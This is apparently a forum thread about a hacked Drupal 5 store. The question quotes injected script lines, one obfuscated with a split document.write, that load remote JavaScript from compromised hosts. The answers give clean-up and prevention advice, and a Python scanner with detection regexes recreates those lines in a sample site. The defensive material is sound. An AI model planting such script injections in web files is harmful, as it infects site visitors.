This is about an online store based on Drupal 5.
All of a sudden it didn't work anymore. Upon accessing the site, this error came up:
Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38
Upon further inspection I found the following two lines at the end of said index.php:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
After manually removing those 2 lines, the site seems to work fine again.
But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected". They all contain an extra line at the end:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up. That site itself seems legitimate. It's probably hacked itself?
Can anybody explain how this could have happened? What can I do to reverse this? And what can I do to avoid this in the future?
Update
After restoring a backup of the website (not the database) it happened again, but now the script tag pointed to dolfy.sedonahyperbarics.com:8080/XHTML.js.
Apparently, a lot of random Drupal user accounts were created as well. So this might be a sign that it was actually a Drupal vulnerability.
We have removed them, and restricted user account creation to admins only (it should have been like that from the beginning, I know :-s). We also changed the admin user password to something safer.
Let's hope it won't come back now.
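As an added example (not code from the question or any of the answers), a small Python script that scans a web root for the three indicators quoted above (the split document.write, a .js loaded from a host:8080 URL, and the 32-hex-digit comment marker), reports each hit with file and line, and strips those lines while keeping the original as a .bak copy for later inspection. The sample site it builds is constructed to mirror the infected index.php and a .js file.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the injected lines quoted in the question.
SIGNATURES = {
    "split-tag": re.compile(r"""document\.write\(\s*['"]<s['"]\s*\+\s*['"]cript""", re.I),
    "remote-8080-js": re.compile(r"""<script[^>]*src=["']https?://[^"'/]+:8080/[^"']+\.js["']""", re.I),
    "hash-marker": re.compile(r"<!--[0-9a-f]{32}-->"),
}
SCAN_SUFFIXES = {".js", ".php", ".html", ".htm"}

def find_injections(root):
    """Walk root; return (path relative to root, line number, signature) per hit."""
    root = Path(root)
    hits = []
    for path in sorted(p for p in root.rglob("*") if p.suffix.lower() in SCAN_SUFFIXES):
        text = path.read_text(encoding="utf-8", errors="replace")
        for no, line in enumerate(text.splitlines(), 1):
            hits += [(path.relative_to(root).as_posix(), no, sig)
                     for sig, rx in SIGNATURES.items() if rx.search(line)]
    return hits

def clean_file(path):
    """Strip matching lines, keeping the original as <name>.bak; return count removed."""
    path = Path(path)
    lines = path.read_text(encoding="utf-8", errors="replace").splitlines(keepends=True)
    keep = [l for l in lines if not any(rx.search(l) for rx in SIGNATURES.values())]
    if len(keep) != len(lines):
        path.replace(path.with_name(path.name + ".bak"))  # preserve evidence
        path.write_text("".join(keep), encoding="utf-8")
    return len(lines) - len(keep)

def make_sample_site():
    """Constructed web root reproducing the injected lines from the question."""
    root = Path(tempfile.mkdtemp(prefix="drupal5-"))
    (root / "misc").mkdir()
    src = 'src="http://blog.nodisposable.com:8080/Hibernate.js"'
    files = {
        "index.php": "<?php\nrequire_once './includes/bootstrap.inc';\n?>\n"
                     '<script type="text/javascript" %s></script>\n'
                     "<!--7379ba6e55616ea66ac9d812fc0597ba-->\n" % src,
        "misc/drupal.js": "var Drupal = Drupal || {};\n"
                          "document.write('<s'+'cript type=\"text/javascript\" %s></scr'+'ipt>');\n" % src,
        "misc/clean.js": "function ok() { return 1; }\n",
    }
    for rel, text in files.items():
        (root / rel).write_text(text, encoding="utf-8")
    return root
```

Run find_injections on the real document root first and review the hits before cleaning; a hit list that keeps growing after a clean-up points to the re-infection path rather than to the files themselves.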
If it's been hacked, you don't know if there's been a back door installed.
You may have to reinstall from a known-good backup after a reformat.
Never trust a system that has had an intruder in the system.
To prevent it in the future, you'd have to keep up with updates, and subscribe to lists that keep up to date with vulnerabilities and best practices for the software you're running (Drupal lists, your platform's security lists, etc.), as well as lock down services to only the users that need to use the system, use secure passwords, not do anything in cleartext, and everything else under security best practices that extends way beyond the context of the answer here. And keep good backups and put in intrusion detection (such as a Tripwire-like system) to check for intruder activity.
Yup, you're infected, I'm afraid. The "how" is, unfortunately, impossible to say without a LOT more investment in time and effort. It could have been a vulnerability in your Drupal install (or one of its modules), it could have been a vulnerability in another app on the same server, it could have been a weak (or stolen) FTP password, etc. There are plenty of possible entry points.
I've seen something very similar (nearly identical) but not related to Drupal, and it was definitely a hack.
Like the others say, it's hard to know without more info about your environment. A quick thing you can do to block it from being served is to put a directive in your .htaccess file that will deny or redirect any requests to that .js file.
While this is based entirely on my own experience, every hack like this, especially with re-infection, was due to someone with FTP access to the server having their local machine infected and something stealing credentials. You want to check the FTP logs and make sure you recognize all the IP addresses and updates as valid; if something is re-infecting, you should see it there quite easily, if that's the case.